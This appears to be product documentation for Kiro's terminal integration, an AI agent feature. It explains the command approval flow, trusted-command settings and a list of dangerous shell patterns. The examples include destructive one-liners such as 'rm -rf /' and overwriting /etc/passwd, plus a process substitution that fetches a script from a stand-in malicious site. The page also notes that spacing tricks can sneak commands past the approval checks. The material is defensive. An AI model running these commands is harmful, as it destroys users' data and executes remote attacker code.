Terminal Integration

Overview

Transform your development workflow with Kiro's terminal integration. Instead of memorizing command syntax or switching between windows, describe what you want to accomplish and Kiro translates your requests into executable commands, maintains context across operations, and provides a secure approval system that keeps you in control while managing dependencies, navigating git workflows, or exploring your codebase.

Getting Started

Simply describe what you want to do in natural language. For example:

"Install the project dependencies"
"Check the git status"
"Find all TypeScript files in the src folder"
"Run the development server"

Kiro translates your request into the appropriate terminal command and asks for your approval before executing. You'll review the suggested command and choose to Modify, Reject, Run, or Run and Trust, then see the output directly in chat.

How It Works

When Kiro suggests a command, you have four options:

Modify - Edit the command before running
Reject - Cancel execution
Run - Execute once
Run and Trust - Execute and trust similar commands in the future

Trust Commands

For security, Kiro asks for approval before running any command. You can streamline this process by configuring which commands to trust automatically.

Trust Read-Only Commands

Automatically run safe commands without prompts. Read-only commands are defined as commands where the root is either ls, cat, pwd, which, head, or tail. These commands are considered safe because they only read or display information without modifying the system or files.

Trusted Commands

When Kiro prompts you to trust a command, you may be presented up to three options to trust it:

Full command - Trust only the exact command provided (e.g., npm run build)
Partial - Trust command variations (e.g., npm test *)
Base - Trust all commands with this root (e.g., npm *)

Alternatively, you can manually configure trusted commands in Settings → Trusted Commands. These settings can be configured at both the user level (global across all workspaces) and workspace level (specific to your current project).

Chained Commands

Kiro can automatically run commands chained with |, &&, or || if they match your trusted commands. Commands in chains can be validated through multiple trust patterns:

Trust Validation Options:

For a command like npm i && npm run build, it can be auto-run if your trusted command list contains any of:

Wildcard matching: npm * (trusts all npm commands)
Individual partial matching: npm i and npm run *
Individual full matching: npm i and npm run build
Full chained command: npm i && npm run build (exact match)

Important: Chaining patterns (|, &&, ||) without surrounding whitespace are treated as potentially dangerous and flagged for security review, while properly spaced commands are handled normally through the trust system.

Dangerous Patterns

For security best practices, certain command patterns are flagged as potentially dangerous and require manual review unless the exact command string has been explicitly trusted. Dangerous patterns are defined as commands containing any of the following characters or sequences:

<( - Process substitution
=( - Process substitution
$( - Command substitution
` - Command substitution (backticks)
> - Output redirection
& - Background execution
; - Command separator
\n - Command injection
$IFS - Variable obfuscation
|, &&, || - Chaining patterns without surrounding whitespace (potential obfuscation)

Examples

Command substitution: echo $(rm -rf /) or echo `malicious-script` - executes hidden code within the command
Process substitution: cat <(curl malicious-site.com/script.sh) - executes remote code as if it were a file
Command chaining: ls && rm -rf / or false || rm important-file - chains destructive commands
Command separation: ls; rm -rf / - runs multiple commands regardless of previous results
Output redirection: echo "data" > /etc/passwd - can overwrite critical system files
Background execution: malicious-script & - can hide processes running in the background
Obfuscation: echo "hello"|rm -rf / - can use improper chaining pattern spacing to hide destructive commands

These patterns are flagged because they can potentially chain commands, redirect output, or execute code in ways that might be unintended or harmful.

Advanced Usage

Using Terminal Context

Reference recent output from your active terminal in your conversations with #terminal. Important: #terminal always refers to the currently active/visible terminal window. If you have multiple terminals open, make sure the terminal you want to reference is active before using #terminal in your chat.

This feature allows Kiro to analyze command results, debug errors, and suggest solutions based on your actual terminal session.

Basic Usage

#terminal analyze the error from the last npm run build

Kiro maintains awareness of command history and outputs, enabling:

Error Analysis - Understanding why commands failed with specific error messages
Output Interpretation - Explaining complex command results and logs
Follow-up Actions - Suggesting next steps based on actual results
Pattern Recognition - Identifying recurring issues across multiple commands
Environment Debugging - Helping resolve system and dependency conflicts

Troubleshooting

For issues with terminal integration and manual setup instructions, see the Shell Integration troubleshooting guide.

Page updated: August 13, 2025

Vibe vs. Spec

Agent Notifications